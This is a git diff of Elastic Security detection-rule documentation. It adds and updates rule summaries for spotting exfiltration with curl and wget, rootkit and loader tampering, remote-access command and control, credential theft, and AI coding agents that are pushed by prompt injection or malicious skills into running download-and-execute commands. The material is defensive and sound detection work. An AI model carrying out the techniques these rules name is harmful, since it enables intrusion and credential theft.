to their C2 server for review. Many threat actors have been observed using curl to upload the collected data. Use of curl in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. | update | 5 + +|<> | Detects the use of wget to upload files to an internet server. Threat actors often will collect data on a system and attempt to exfiltrate it back to their command and control servers. Use of wget in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. | update | 2 + +|<> | Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. | update | 215 + +|<> | This rule detects the loading of a kernel module from an unusual location. Threat actors may use this technique to maintain persistence on a system by loading a kernel module into the kernel namespace. This behavior is strongly related to the presence of a rootkit on the system. | update | 2 + +|<> | Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. | update | 127 + +|<> | Detects DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains from processes that are not browsers. Intended to surface RMM clients, scripts, or other non-browser activity contacting these services. | update | 3 + +|<> | Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads. | update | 12 + +|<> | Adversaries may install legitimate remote monitoring and management (RMM) tools or remote access software on compromised endpoints for command-and-control (C2), persistence, and execution of native commands. This rule detects when a process is started whose name or code signature (or whose parent's name or code signature) resembles commonly abused RMM/remote access tools, including first-time-seen child processes of such tools. New Terms type: host has not seen this process (or child-of-RMM pattern) before within the configured history window. | update | 116 + +|<> | Identifies powershell.exe being used to download an executable file from an untrusted remote destination. | update | 115 + +|<> | Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. | update | 214 + +|<> | Identifies an executable or script file remotely downloaded via a TeamViewer transfer session. | update | 217 + +|<> | Detects the execution of the VScode portable binary with the tunnel command line option indicating an attempt to establish a remote tunnel session to Github or a remote VScode instance. | update | 110 + +|<> | Identifies multiple consecutive logon failures targeting more than one Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. | update | 118 + +|<> | Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. | update | 118 + +|<> | Identifies attempts to clear Windows event log stores. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. | update | 216 + +|<> | Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware. | update | 2 + +|<> | Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. | update | 318 + +|<> | Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. | update | 315 + +|<> | Identifies suspicious creation of Alternate Data Streams on highly targeted files using a script or command interpreter. This is uncommon for legitimate files and sometimes done by adversaries to hide malware. | update | 322 + +|<> | Identifies a process started by Notepad after opening a Markdown file. This may indicate successful exploitation of a Notepad markdown parsing vulnerability (CVE-2026-20841) that can lead to arbitrary code execution. | update | 2 + +|<> | Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. | update | 112 + +|<> | Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. | update | 121 + +|<> | Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment. | update | 316 + +|<> | Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. | update | 119 + +|<> | Identifies a user account (often a service account) that normally logs in with high volume using one logon type suddenly showing successful logons using a different logon type with low count. This pattern may indicate account takeover or use of stolen credentials from a new context (e.g. interactive or network logon where only batch/service was expected). | update | 2 + +|<> | Identifies a user account that normally logs in with high volume from one source IP suddenly logging in from a different source IP. This pattern (one IP with many successful logons, another IP with very few) may indicate account takeover or use of stolen credentials from a new location. | update | 2 + +|============================================== diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc index c366ae5437..cb12db86fb 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc @@ -13,6 +13,10 @@ For previous rule updates, please navigate to the https://www.elastic.co/guide/e |Update version |Date | New rules | Updated rules | Notes +|<> | 24 Mar 2026 | 25 | 44 | +This release includes new rules for Linux, Azure, MacOS, Microsoft 365, Kubernetes, AWS and Windows. New rules for Linux 365 include detection for privilege escalation, exfiltration and defense evasion. New rules for Azure include detection for initial access, credential access and initial access. New rules for MacOS include detection for credential access, persistence, and execution. New rules for Microsoft 365 include detection for defense evasion and privilege escalation. New rules for Kubernetes include detection for credential access. New rules for AWS include detection for exfiltration and execution. New rules for Windows include detection for command and control, exfiltration, and execution. Additionally, significant rule tuning for Windows, Azure, Linux, MacOS, Nginx and Fortinet rules has been added for better rule efficacy and performance. + + |<> | 11 Mar 2026 | 10 | 34 | This release includes new rules for Microsoft 365, Kubernetes, Okta and Windows. New rules for Microsoft 365 include detection for initial access, collection, discovery, credential access and defense evasion. New rules for Kubernetes include detection for privilege escalation. New rules for Windows include detection for privilege escalation, command and control and initial access. Additionally, significant rule tuning for Windows, Linux, Kubernetes, PAN-OS, Microsoft 365 and AWS rules has been added for better rule efficacy and performance. @@ -98,3 +102,4 @@ include::downloadable-packages/8-19-14/prebuilt-rules-8-19-14-summary.asciidoc[l include::downloadable-packages/8-19-15/prebuilt-rules-8-19-15-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-19-16/prebuilt-rules-8-19-16-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-19-17/prebuilt-rules-8-19-17-summary.asciidoc[leveloffset=+1] +include::downloadable-packages/8-19-18/prebuilt-rules-8-19-18-summary.asciidoc[leveloffset=+1] diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc index ebc562badb..9a148d5d76 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc @@ -18,6 +18,8 @@ and their rule type is `machine_learning`. |<> |Detects file creation events in the configuration directory for the APT package manager. In Linux, APT (Advanced Package Tool) is a command-line utility used for handling packages on (by default) Debian-based systems, providing functions for installing, updating, upgrading, and removing software along with managing package repositories. Attackers can backdoor APT to gain persistence by injecting malicious code into scripts that APT runs, thereby ensuring continued unauthorized access or control each time APT is used for package management. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |8 +|<> |Identifies AWS API activity originating from uncommon desktop client applications based on the user agent string. This rule detects S3 Browser and Cyberduck, which are graphical S3 management tools that provide bulk upload/download capabilities. While legitimate, these tools are rarely used in enterprise environments and have been observed in use by threat actors for data exfiltration. Any activity from these clients should be validated against authorized data transfer workflows. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Data Source: AWS S3], [Tactic: Exfiltration], [Use Case: Threat Detection], [Resources: Investigation Guide] |None |1 + |<> |This rule identifies potentially suspicious activity by detecting instances where a single IAM user's temporary session token is accessed from multiple IP addresses within a short time frame. Such behavior may suggest that an adversary has compromised temporary credentials and is utilizing them from various locations. To enhance detection accuracy and minimize false positives, the rule incorporates criteria that evaluate unique IP addresses, user agents, cities, and networks. These additional checks help distinguish between legitimate distributed access patterns and potential credential misuse. Detected activities are classified into different types based on the combination of unique indicators, with each classification assigned a fidelity score reflecting the likelihood of malicious behavior. High fidelity scores are given to patterns most indicative of threats, such as multiple unique IPs, networks, cities, and user agents. Medium and low fidelity scores correspond to less severe patterns, enabling security teams to effectively prioritize alerts. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Data Source: AWS CloudTrail], [Tactic: Initial Access], [Use Case: Identity and Access Audit], [Resources: Investigation Guide] |None |106 |<> |Identifies multiple successive failed attempts to use denied model resources within AWS Bedrock. This could indicated attempts to bypass limitations of other approved models, or to force an impact on the environment by incurring exhorbitant costs. |[Domain: LLM], [Data Source: AWS Bedrock], [Data Source: AWS S3], [Resources: Investigation Guide], [Use Case: Policy Violation], [Mitre Atlas: T0015], [Mitre Atlas: T0034] |None |7 @@ -34,6 +36,8 @@ and their rule type is `machine_learning`. |<> |Identifies usage of the AWS CLI from a client reporting a user agent string indicating the request was made from a Kali Linux distribution. Kali Linux is commonly used for offensive security testing and adversary tradecraft. While not inherently malicious, AWS CLI activity originating from Kali is uncommon in most production environments and may indicate compromised credentials, unauthorized access, or post-exploitation activity using valid cloud accounts. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Tactic: Initial Access], [Use Case: Cloud Threat Detection], [Resources: Investigation Guide] |None |3 +|<> |Identifies the creation of a new AWS CloudShell environment. CloudShell is a browser-based shell that provides command-line access to AWS resources directly from the AWS Management Console. The CreateEnvironment API is called when a user launches CloudShell for the first time or when accessing CloudShell in a new AWS region. Adversaries with console access may use CloudShell to execute commands, install tools, or interact with AWS services without needing local CLI credentials. Monitoring environment creation helps detect unauthorized CloudShell usage from compromised console sessions. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Data Source: AWS CloudShell], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide] |None |1 + |<> |Detects creation of a new AWS CloudTrail trail via CreateTrail API. While legitimate during onboarding or auditing improvements, adversaries can create trails that write to attacker-controlled destinations, limit regions, or otherwise subvert monitoring objectives. New trails should be validated for destination ownership, encryption, multi-region coverage, and organizational scope. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Cloudtrail], [Use Case: Log Auditing], [Tactic: Collection], [Resources: Investigation Guide] |None |212 |<> |Detects deletion of an AWS CloudTrail trail via DeleteTrail API. Removing trails is a high-risk action that destroys an audit control plane and is frequently paired with other destructive or stealthy operations. Validate immediately and restore compliant logging. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Cloudtrail], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |None |214 @@ -328,6 +332,12 @@ and their rule type is `machine_learning`. |<> |Identifies unusual parent-child process relationships that can indicate malware execution or persistence mechanisms. Malicious scripts often call on other applications and processes as part of their exploit payload. For example, when a malicious Office document runs scripts as part of an exploit payload, Excel or Word may start a script interpreter process, which, in turn, runs a script that downloads and executes malware. Another common scenario is Outlook running an unusual process when malware is downloaded in an email. Monitoring and identifying anomalous process relationships is a method of detecting new and emerging malware that is not yet recognized by anti-virus scanners. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Persistence], [Resources: Investigation Guide] |None |211 +|<> |Identifies access to AppArmor kernel policy control interfaces through the .load, .replace, or .remove files under /sys/kernel/security/apparmor/. These special files are used to load, modify, or remove AppArmor profiles and are rarely accessed during normal system activity outside of policy administration. Reads or writes to these interfaces may indicate legitimate security configuration changes, but can also reflect defense evasion, unauthorized policy tampering, or the installation of attacker-controlled profiles. This detection is especially valuable on systems where AppArmor policy changes are uncommon or tightly controlled. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Auditd Manager], [Resources: Investigation Guide] |None |1 + +|<> |Identifies events where the AppArmor security module blocked or restricted an operation due to a policy violation. AppArmor enforces mandatory access control policies that limit how processes interact with system resources such as files, network sockets, and capabilities. When a process attempts an action that is not permitted by the active profile, the kernel generates a policy violation event. While these events can occur during normal operation or misconfiguration, they may also indicate attempted privilege escalation, restricted file access, or malicious activity being prevented by the system's security policy. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Auditd Manager], [Resources: Investigation Guide] |None |1 + +|<> |Detects the execution of "apparmor_parser" using the "-o" option to write a compiled AppArmor profile to an output file. This functionality is normally used by system administration tools or package installation scripts when building or loading AppArmor policies. In adversarial scenarios, attackers may use "apparmor_parser" to compile custom AppArmor profiles that can later be loaded into the kernel through AppArmor policy management interfaces. Malicious profiles may weaken security controls, alter the behavior of privileged programs, or assist in exploitation chains involving AppArmor policy manipulation. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Auditd Manager], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |1 + |<> |Detects execution via the Apple script interpreter (osascript) followed by a network connection from the same process within a short time period. Adversaries may use malicious scripts for execution and command and control. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |112 |<> |Identifies execution of the Apple script interpreter (osascript) without a password prompt and with administrator privileges. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |212 @@ -374,7 +384,7 @@ and their rule type is `machine_learning`. |<> |Identifies attempts to enable the root account using the dsenableroot command. This command may be abused by adversaries for persistence, as the root account is disabled by default. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |110 -|<> |Detects the execution of the VScode portable binary with the tunnel command line option indicating an attempt to establish a remote tunnel session to Github or a remote VScode instance. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Windows Security Event Logs], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |109 +|<> |Detects the execution of the VScode portable binary with the tunnel command line option indicating an attempt to establish a remote tunnel session to Github or a remote VScode instance. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Windows Security Event Logs], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |110 |<> |Detects attempts to install or use Kali Linux via Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |214 @@ -406,6 +416,8 @@ and their rule type is `machine_learning`. |<> |Authorization plugins are used to extend the authorization services API and implement mechanisms that are not natively supported by the OS, such as multi-factor authentication with third party software. Adversaries may abuse this feature to persist and/or collect clear text credentials as they traverse the registered plugins during user logon. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |111 +|<> |Detects when a service principal or user performs an Azure Arc cluster credential listing operation from a source IP not previously associated with that identity. The `listClusterUserCredential` action retrieves credentials for the Arc Cluster Connect proxy, enabling kubectl access through the Azure ARM API. An adversary using stolen service principal credentials will typically call this operation from infrastructure not previously seen for that SP. By tracking the combination of caller identity and source IP, this rule avoids false positives from backend services and CI/CD pipelines that rotate IPs but maintain consistent identity-to-IP patterns over time. |[Domain: Cloud], [Data Source: Azure], [Data Source: Azure Arc], [Data Source: Azure Activity Logs], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 + |<> |Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 |<> |Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Execution], [Resources: Investigation Guide] |None |106 @@ -456,6 +468,10 @@ and their rule type is `machine_learning`. |<> |Identifies the deletion of a resource group in Azure, which includes all resources within the group. Deletion is permanent and irreversible. An adversary may delete a resource group in an attempt to evade defenses or intentionally destroy data. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Impact], [Resources: Investigation Guide] |None |107 +|<> |Detects when an Azure service principal authenticates from multiple countries within a short time window, which may indicate stolen credentials being used from different geographic locations. Service principals typically authenticate from consistent locations tied to their deployment infrastructure. Authentication from multiple countries in a brief period suggests credential compromise, particularly when the source countries do not align with the organization's expected operating regions. This pattern has been observed in attacks using stolen CI/CD credentials, phished service principal secrets, and compromised automation accounts. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |1 + +|<> |Detects when a service principal authenticates to Microsoft Entra ID and then lists credentials for an Azure Arc-connected Kubernetes cluster within a short time window. The `listClusterUserCredential` action retrieves tokens that enable kubectl access through the Arc Cluster Connect proxy. This sequence (service principal sign-in followed by Arc credential retrieval), represents the exact attack chain used by adversaries with stolen service principal secrets to establish a proxy tunnel into Kubernetes clusters. Service principals that authenticate externally (as opposed to managed identities) and immediately access Arc cluster credentials warrant investigation, particularly when the sign-in originates from an unexpected location or ASN. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Azure Arc], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Initial Access], [Resources: Investigation Guide] |None |1 + |<> |Identifies when Azure Storage Account Blob public access is enabled, allowing external access to blob containers. This technique was observed in cloud ransom-based campaigns where threat actors modified storage accounts to expose non-remotely accessible accounts to the internet for data exfiltration. Adversaries abuse the Microsoft.Storage/storageAccounts/write operation to modify public access settings. |[Domain: Cloud], [Domain: Storage], [Data Source: Azure], [Data Source: Azure Activity Logs], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |1 |<> |Identifies when an Azure Storage Account is deleted. Adversaries may delete storage accounts to disrupt operations, destroy evidence, or cause denial of service. This activity could indicate an attacker attempting to cover their tracks after data exfiltration or as part of a destructive attack. Monitoring storage account deletions is critical for detecting potential impact on business operations and data availability. |[Domain: Cloud], [Domain: Storage], [Data Source: Azure], [Data Source: Azure Activity Logs], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |1 @@ -532,7 +548,7 @@ and their rule type is `machine_learning`. |<> |Identifies PowerShell.exe or Cmd.exe execution spawning from Windows Script Host processes Wscript.exe. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Elastic Endgame], [Data Source: Crowdstrike] |None |208 -|<> |Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |118 +|<> |Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |119 |<> |Identifies the image load of a compression DLL. Adversaries will often compress and encrypt data in preparation for exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Rule Type: BBR] |None |5 @@ -542,7 +558,7 @@ and their rule type is `machine_learning`. |<> |Identifies unusual processes connecting to domains using known free SSL certificates. Adversaries may employ a known encryption algorithm to conceal command and control traffic. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Data Source: Sysmon], [Resources: Investigation Guide] |None |210 -|<> |Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: SentinelOne] |None |126 +|<> |Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: SentinelOne] |None |127 |<> |Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to publicly routable IP addresses. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |212 @@ -662,7 +678,7 @@ and their rule type is `machine_learning`. |<> |This rule leverages alert data from various Discovery building block rules to alert on signals with unusual unique host.id and user.id entries. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: Higher-Order Rule], [Rule Type: BBR] |None |3 -|<> |This rule correlates security alerts with processes exhibiting unusually high CPU utilization on the same host and process ID within a short time window. This behavior may indicate malicious activity such as malware execution, cryptomining, exploit payload execution, or abuse of system resources following initial compromise. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Domain: Endpoint], [Tactic: Impact] |None |3 +|<> |This rule correlates security alerts with processes exhibiting unusually high CPU utilization on the same host and process ID within a short time window. This behavior may indicate malicious activity such as malware execution, cryptomining, exploit payload execution, or abuse of system resources following initial compromise. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Domain: Endpoint], [Tactic: Impact] |None |4 |<> |This rule identifies the creation of directories in the /bin directory. The /bin directory contains essential binary files that are required for the system to function properly. The creation of directories in this location could be an attempt to hide malicious files or executables, as these /bin directories usually just contain binaries. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |106 @@ -704,7 +720,7 @@ and their rule type is `machine_learning`. |<> |This rule detects the creation of the dynamic linker (ld.so). The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |106 -|<> |Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |214 +|<> |Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |215 |<> |Detects the creation of files related to the configuration of the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. This technique is often observed by userland rootkits that leverage shared objects to maintain persistence on a compromised host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |8 @@ -716,9 +732,9 @@ and their rule type is `machine_learning`. |<> |This rule identifies a sequence of events where a process named "entrypoint.sh" is started in a container, followed by a network connection attempt. This sequence indicates a potential egress connection from an entrypoint in a container. An entrypoint is a command or script specified in the Dockerfile and executed when the container starts. Attackers can use this technique to establish a foothold in the environment, escape from a container to the host, or establish persistence. |[Domain: Endpoint], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 -|<> |Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |112 +|<> |Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |113 -|<> |Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection. |[Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |1 +|<> |Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection. |[Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |2 |<> |This rule correlates any Elastic Defend alert with an email security related alert by target user name. This may indicate the successful execution of a phishing attack. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Check Point Harmony Email & Collaboration], [Domain: Email], [Domain: Endpoint] |None |3 @@ -884,7 +900,7 @@ and their rule type is `machine_learning`. |<> |Identifies the execution of DotNet ClickOnce installer via Dfsvc.exe trampoline. Adversaries may take advantage of ClickOnce to proxy execution of malicious payloads via trusted Microsoft processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |None |3 -|<> |Detects suspicious child process execution from the OpenClaw, Moltbot, or Clawdbot AI coding agents running via Node.js. These tools can execute arbitrary shell commands through skills or prompt injection attacks. Malicious skills from public registries like ClawHub have been observed executing obfuscated download-and-execute commands targeting cryptocurrency wallets and credentials. This rule identifies shells, scripting interpreters, and common LOLBins spawned by these AI agents. |[Domain: Endpoint], [Domain: LLM], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 +|<> |Detects suspicious child process execution from the OpenClaw, Moltbot, or Clawdbot AI coding agents running via Node.js. These tools can execute arbitrary shell commands through skills or prompt injection attacks. Malicious skills from public registries like ClawHub have been observed executing obfuscated download-and-execute commands targeting cryptocurrency wallets and credentials. This rule identifies shells, scripting interpreters, and common LOLBins spawned by these AI agents. |[Domain: Endpoint], [Domain: LLM], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 |<> |Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], 